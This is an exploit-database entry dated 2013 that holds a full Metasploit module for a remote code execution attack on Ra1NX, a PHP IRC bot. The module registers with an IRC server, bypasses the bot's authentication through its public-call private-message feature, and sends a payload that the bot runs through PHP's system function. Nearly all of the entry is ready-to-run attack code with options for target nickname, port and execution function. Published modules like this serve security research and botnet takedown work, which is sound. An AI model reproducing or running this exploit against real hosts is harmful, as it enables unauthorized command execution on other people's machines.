Ra1NX PHP Bot Authentication Bypass Remote Code Execution

2013.03.25
Credit: bwall
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: "Ra1NX" PHP Bot pubcall Authentication Bypass Remote Code Execution # Date: March 24, 2013 # Exploit Author: bwall # Software Link: https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0 # Version: v2.0 # Tested on: Ubuntu require 'msf/core' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => '"Ra1NX" PHP Bot pubcall Authentication Bypass Remote Code Execution', 'Description' => %q{ This module allows remote command execution on the PHP IRC bot Ra1NX by using the public call feature in private message to covertly bypass the authentication system. }, 'Author' => [ 'bwall <bwall[at]openbwall.com>' # Ra1NX analysis and Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['URL', 'https://defense.ballastsecurity.net/wiki/index.php/Ra1NX_bot'], ['URL', 'https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0'], ['URL', 'http://ddecode.com/phpdecoder/?results=8c6ba611ea2a504da928c6e176a6537b'] ], 'Platform' => [ 'unix', 'win'], 'Arch' => ARCH_CMD, 'Payload' => { 'Space' => 344, 'BadChars' => '', 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd', } }, 'Targets' => [ [ 'Ra1NX', { } ] ], 'Privileged' => false, 'DisclosureDate' => 'March 24 2013', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(6667), OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']), OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']), OptString.new('RNICK', [true, 'Nickname of Target IRC Bot', 'jhl1']), OptString.new('PHP_EXEC', [true, 'Function used to call payload', 'system']) ], self.class) end def check connect response = register(sock) if response =~ /463/ or response =~ /464/ print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed") return Exploit::CheckCode::Unknown end confirm_string = rand_text_alpha(8) response = send_msg(sock, "PRIVMSG #{datastore['RNICK']} :#{datastore['RNICK']} @msg #{datastore['NICK']} #{confirm_string}\r\n") print response quit(sock) disconnect if response =~ /#{confirm_string}/ return Exploit::CheckCode::Vulnerable else return Exploit::CheckCode::Safe end end def send_msg(sock, data) sock.put(data) data = "" begin read_data = sock.get_once(-1, 1) while not read_data.nil? data << read_data read_data = sock.get_once(-1, 1) end rescue EOFError end data end def register(sock) msg = "" if datastore['IRC_PASSWORD'] and not datastore['IRC_PASSWORD'].empty? msg << "PASS #{datastore['IRC_PASSWORD']}\r\n" end if datastore['NICK'].length > 9 nick = rand_text_alpha(9) print_error("The nick is longer than 9 characters, using #{nick}") else nick = datastore['NICK'] end msg << "NICK #{nick}\r\n" msg << "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}\r\n" response = send_msg(sock,msg) return response end def ra1nx_command(sock) encoded = payload.encoded command_msg = "PRIVMSG #{datastore['RNICK']} :#{datastore['RNICK']} @#{datastore['PHP_EXEC']} #{encoded}\r\n" response = send_msg(sock, command_msg) return response end def quit(sock) quit_msg = "QUIT :bye bye\r\n" sock.put(quit_msg) end def exploit connect print_status("#{rhost}:#{rport} - Registering with the IRC Server...") response = register(sock) if response =~ /463/ or response =~ /464/ print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed") return end print_status("#{rhost}:#{rport} - Exploiting the Ra1NX bot...") ra1nx_command(sock) quit(sock) disconnect end end

References:

https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top